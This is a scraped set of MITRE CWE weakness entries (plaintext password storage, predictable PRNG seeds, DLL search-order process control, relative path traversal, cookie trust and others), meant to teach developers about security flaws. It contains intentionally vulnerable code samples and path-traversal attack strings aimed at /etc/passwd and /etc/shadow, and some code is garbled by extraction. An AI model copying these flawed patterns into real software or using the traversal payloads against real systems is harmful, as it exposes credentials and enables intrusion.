or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-256: Plaintext Storage of a Password
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code reads a password from a properties file and uses the password to connect to a database. (bad code)
Example Language: Java
...
Properties prop = new Properties(); prop.load(new FileInputStream("config.properties")); String password = prop.getProperty("password"); DriverManager.getConnection(url, usr, password); ... This code will run successfully, but anyone who has access to config.properties can read the value of password. If a devious employee has access to this information, they can use it to break into the system. Example 2 The following code reads a password from the registry and uses the password to create a new network credential. (bad code)
Example Language: Java
...
String password = regKey.GetValue(passKey).toString(); NetworkCredential netCred = new NetworkCredential(username,password,domain); ... This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system Example 3 The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. This Java example shows a properties file with a cleartext username / password pair. (bad code)
Example Language: Java
# Java Web App ResourceBundle properties file ... webapp.ldap.username=secretUsername webapp.ldap.password=secretPassword ... The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. (bad code)
Example Language: ASP.NET
...
<connectionStrings> <add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /> </connectionStrings>... Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. Example 4 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. At least one OT product stored a password in plaintext. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-342: Predictable Exact Value from Previous Values
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterAn exact value or random number can be precisely predicted by observing previous values.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG)
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterA Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time.
The use of predictable seeds significantly reduces the number of possible seeds that an attacker would need to test in order to predict which random numbers will be generated by the PRNG.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number: (bad code)
Example Language: Java
Random random = new Random(System.currentTimeMillis());
int accountID = random.nextInt(); (bad code)
Example Language: C
srand(time());
int randNum = rand(); An attacker can easily predict the seed used by these PRNGs, and so also predict the stream of random numbers generated. Note these examples also exhibit CWE-338 (Use of Cryptographically Weak PRNG). Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-114: Process Control
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterExecuting commands or loading libraries from an untrusted source or in an untrusted environment can cause an application to execute malicious commands (and payloads) on behalf of an attacker.
Process control vulnerabilities take two forms:
Process control vulnerabilities of the first type occur when either data enters the application from an untrusted source and the data is used as part of a string representing a command that is executed by the application. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "Seven Pernicious Kingdoms" (View-700)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code uses System.loadLibrary() to load code from a native library named library.dll, which is normally found in a standard system directory. (bad code)
Example Language: Java
...
System.loadLibrary("library.dll"); ... The problem here is that System.loadLibrary() accepts a library name, not a path, for the library to be loaded. From the Java 1.4.2 API documentation this function behaves as follows [1]: A file containing native code is loaded from the local file system from a place where library files are conventionally obtained. The details of this process are implementation-dependent. The mapping from a library name to a specific filename is done in a system-specific manner. If an attacker is able to place a malicious copy of library.dll higher in the search order than file the application intends to load, then the application will load the malicious copy instead of the intended file. Because of the nature of the application, it runs with elevated privileges, which means the contents of the attacker's library.dll will now be run with elevated privileges, possibly giving them complete control of the system. Example 2 The following code from a privileged application uses a registry entry to determine the directory in which it is installed and loads a library file based on a relative path from the specified directory. (bad code)
Example Language: C
...
RegQueryValueEx(hkey, "APPHOME", 0, 0, (BYTE*)home, &size); char* lib=(char*)malloc(strlen(home)+strlen(INITLIB)); if (lib) { strcpy(lib,home); strcat(lib,INITCMD); LoadLibrary(lib); ... The code in this example allows an attacker to load an arbitrary library, from which code will be executed with the elevated privilege of the application, by modifying a registry key to specify a different path containing a malicious version of INITLIB. Because the program does not validate the value read from the environment, if an attacker can control the value of APPHOME, they can fool the application into running malicious code. Example 3 The following code is from a web-based administration utility that allows users access to an interface through which they can update their profile on the system. The utility makes use of a library named liberty.dll, which is normally found in a standard system directory. (bad code)
Example Language: C
LoadLibrary("liberty.dll");
The problem is that the program does not specify an absolute path for liberty.dll. If an attacker is able to place a malicious library named liberty.dll higher in the search order than file the application intends to load, then the application will load the malicious copy instead of the intended file. Because of the nature of the application, it runs with elevated privileges, which means the contents of the attacker's liberty.dll will now be run with elevated privileges, possibly giving the attacker complete control of the system. The type of attack seen in this example is made possible because of the search order used by LoadLibrary() when an absolute path is not specified. If the current directory is searched before system directories, as was the case up until the most recent versions of Windows, then this type of attack becomes trivial if the attacker can execute the program locally. The search order is operating system version dependent, and is controlled on newer operating systems by the value of the registry key: HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
CWE-693: Protection Mechanism Failure
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.
This weakness covers three distinct situations. A "missing" protection mechanism occurs when the application does not define any mechanism against a certain class of attack. An "insufficient" protection mechanism might provide some defenses - for example, against the most common attacks - but it does not protect against everything that is intended. Finally, an "ignored" mechanism occurs when a mechanism is available and in active use within the product, but the developer has not applied it in some code path.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Research Gap
The concept of protection mechanisms is well established, but protection mechanism failures have not been studied comprehensively. It is suspected that protection mechanisms can have significantly different types of weaknesses than the weaknesses that they are intended to prevent.
CWE-500: Public Static Field Not Marked Final
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterAn object contains a public static field that is not marked final, which might allow it to be modified in unexpected ways.
Public static variables can be read without an accessor and changed without a mutator by any classes in the application.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following examples use of a public static String variable to contain the name of a property/configuration file for the application. (bad code)
Example Language: C++
class SomeAppClass {
public: static string appPropertiesConfigFile = "app/properties.config";
... (bad code)
Example Language: Java
public class SomeAppClass {
public static String appPropertiesFile = "app/Application.properties"; ... Having a public static variable that is not marked final (constant) may allow the variable to the altered in a way not intended by the application. In this example the String variable can be modified to indicate a different on nonexistent properties file which could cause the application to crash or caused unexpected behavior. (good code)
Example Language: C++
class SomeAppClass {
public: static const string appPropertiesConfigFile = "app/properties.config";
... (good code)
Example Language: Java
public class SomeAppClass {
public static final String appPropertiesFile = "app/Application.properties"; ...
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-23: Relative Path Traversal
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following URLs are vulnerable to this attack: (bad code)
Example Language: Other
http://example.com/get-files.jsp?file=report.pdf
http://example.com/get-page.php?home=aaa.html http://example.com/some-page.asp?page=index.html A simple way to execute this attack is like this: (attack code)
Example Language: Other
http://example.com/get-files?file=../../../../somedir/somefile
http://example.com/../../../../etc/shadow http://example.com/get-files?file=../../../../etc/passwd Example 2 The following code could be for a social networking application in which each user's profile information is stored in a separate file. All files are stored in a single directory. (bad code)
Example Language: Perl
my $dataPath = "/users/cwe/profiles";
my $username = param("user"); my $profilePath = $dataPath . "/" . $username; open(my $fh, "<", $profilePath) || ExitError("profile read error: $profilePath"); print "<ul>\n"; while (<$fh>) { print "<li>$_</li>\n"; }print "</ul>\n"; While the programmer intends to access files such as "/users/cwe/profiles/alice" or "/users/cwe/profiles/bob", there is no verification of the incoming user parameter. An attacker could provide a string such as: (attack code)
../../../etc/passwd
The program would generate a profile pathname like this: (result)
/users/cwe/profiles/../../../etc/passwd
When the file is opened, the operating system resolves the "../" during path canonicalization and actually accesses this file: (result)
/etc/passwd
As a result, the attacker could read the entire text of the password file. Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined. Example 3 The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet. (good code)
Example Language: HTML
<form action="FileUploadServlet" method="post" enctype="multipart/form-data">
Choose a file to upload: <input type="file" name="filename"/> <br/> <input type="submit" name="submit" value="Submit"/> </form> When submitted the Java servlet's doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory. (bad code)
Example Language: Java
public class FileUploadServlet extends HttpServlet {
...
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { response.setContentType("text/html");
PrintWriter out = response.getWriter(); String contentType = request.getContentType(); // the starting position of the boundary header int ind = contentType.indexOf("boundary="); String boundary = contentType.substring(ind+9); String pLine = new String(); String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value // verify that content type is multipart form data if (contentType != null && contentType.indexOf("multipart/form-data") != -1) { // extract the filename from the Http header
BufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream())); ... pLine = br.readLine(); String filename = pLine.substring(pLine.lastIndexOf("\\"), pLine.lastIndexOf("\"")); ... // output the file to the local upload directory try { BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));
for (String line; (line=br.readLine())!=null; ) { if (line.indexOf(boundary) == -1) { } //end of for loopbw.write(line); }bw.newLine(); bw.flush(); bw.close(); } catch (IOException ex) {...} // output successful upload response HTML page // output unsuccessful upload response HTML page else {...} ...
This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code. Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use "../" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-1329: Reliance on Component That is Not Updateable
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product contains a component that cannot be updated or patched in order to remove vulnerabilities or significant bugs.
If the component is discovered to contain a vulnerability or critical bug, but the issue cannot be fixed using an update or patch, then the product's owner will not be able to protect against the issue. The only option might be replacement of the product, which could be too financially or operationally expensive for the product owner. As a result, the inability to patch or update can leave the product open to attacker exploitation or critical operation failures. This weakness can be especially difficult to manage when using ROM, firmware, or similar components that traditionally have had limited or no update capabilities. In industries such as healthcare, "legacy" devices can be operated for decades. As a US task force report [REF-1197] notes, "the inability to update or replace equipment has both large and small health care delivery organizations struggle with numerous unsupported legacy systems that cannot easily be replaced (hardware, software, and operating systems) with large numbers of vulnerabilities and few modern countermeasures." While hardware can be prone to this weakness, software systems can also be affected, such as when a third-party driver or library is no longer actively maintained or supported but is still critical for the required functionality. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Hardware Design" (View-1194)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 A refrigerator has an Internet interface for the official purpose of alerting the manufacturer when that refrigerator detects a fault. Because the device is attached to the Internet, the refrigerator is a target for hackers who may wish to use the device other potentially more nefarious purposes. (bad code)
Example Language: Other
The refrigerator has no means of patching and is hacked, becoming a spewer of email spam.
(good code)
Example Language: Other
The device automatically patches itself and provides considerable more protection against being hacked.
Example 2
A System-on-Chip (SOC) implements a Root-of-Trust (RoT) in ROM to boot secure code. However, at times this ROM code might have security vulnerabilities and need to be patched. Since ROM is immutable, it can be impossible to patch. ROM does not have built-in application-programming interfaces (APIs) to patch if the code is vulnerable. Implement mechanisms to patch the vulnerable ROM code. Example 3 The example code is taken from the JTAG module of the buggy OpenPiton SoC of HACK@DAC'21. JTAG is protected with a password checker. Access to JTAG operations will be denied unless the correct password is provided by the user. This user-provided password is first sent to the HMAC module where it is hashed with a secret crypto key. This user password hash (pass_hash) is then compared with the hash of the correct password (exp_hash). If they match, JTAG will then be unlocked. (bad code)
Example Language: Verilog
module dmi_jtag(...)(...);
...
PassChkValid: begin
if(hashValid) begin
if(exp_hash == pass_hash) begin
end else begin
pass_check = 1'b1;
end else begin
pass_check = 1'b0;
endstate_d = Idle; state_d = PassChkValid; end
hmac hmac(
...
.key_i(256'h24e6fa2254c2ff632a41b...),
);
...endmodule However, the SoC's crypto key is hardcoded into the design and cannot be updated [REF-1387]. Therefore, if the key is leaked somehow, there is no way to reprovision the key without having the device replaced. To fix this issue, a local register should be used (hmac_key_reg) to store the crypto key. If designers need to update the key, they can upload the new key through an input port (hmac_key_i) to the local register by enabling the patching signal (hmac_patch_en) [REF-1388]. (good code)
Example Language: Verilog
module dmi_jtag(...
) (
input logic [255:0] hmac_key_i,
);input logic hmac_patch_en, ... reg [255:0] hmac_key_reg; ... ...
always_ff @(posedge tck_i or negedge trst_ni) begin
...... if (hmac_patch_en)
hmac_key_reg <= hmac_key_i;
...end
hmac hmac(
...... .key_i(hmac_key_reg), ... ); endmodule Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-565: Reliance on Cookies without Validation and Integrity Checking
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code excerpt reads a value from a browser cookie to determine the role of the user. (bad code)
Example Language: Java
Cookie[] cookies = request.getCookies();
for (int i =0; i< cookies.length; i++) { Cookie c = cookies[i]; }if (c.getName().equals("role")) { userRole = c.getValue(); }It is easy for an attacker to modify the "role" value found in the locally stored cookie, allowing privilege escalation. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This problem can be primary to many types of weaknesses in web applications. A developer may perform proper validation against URL parameters while assuming that attackers cannot modify cookies. As a result, the program might skip basic input validation to enable cross-site scripting, SQL injection, price tampering, and other attacks..
CWE-784: Reliance on Cookies without Validation and Integrity Checking in a Security Decision
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a protection mechanism that relies on the existence or values of a cookie, but it does not properly ensure that the cookie is valid for the associated user.
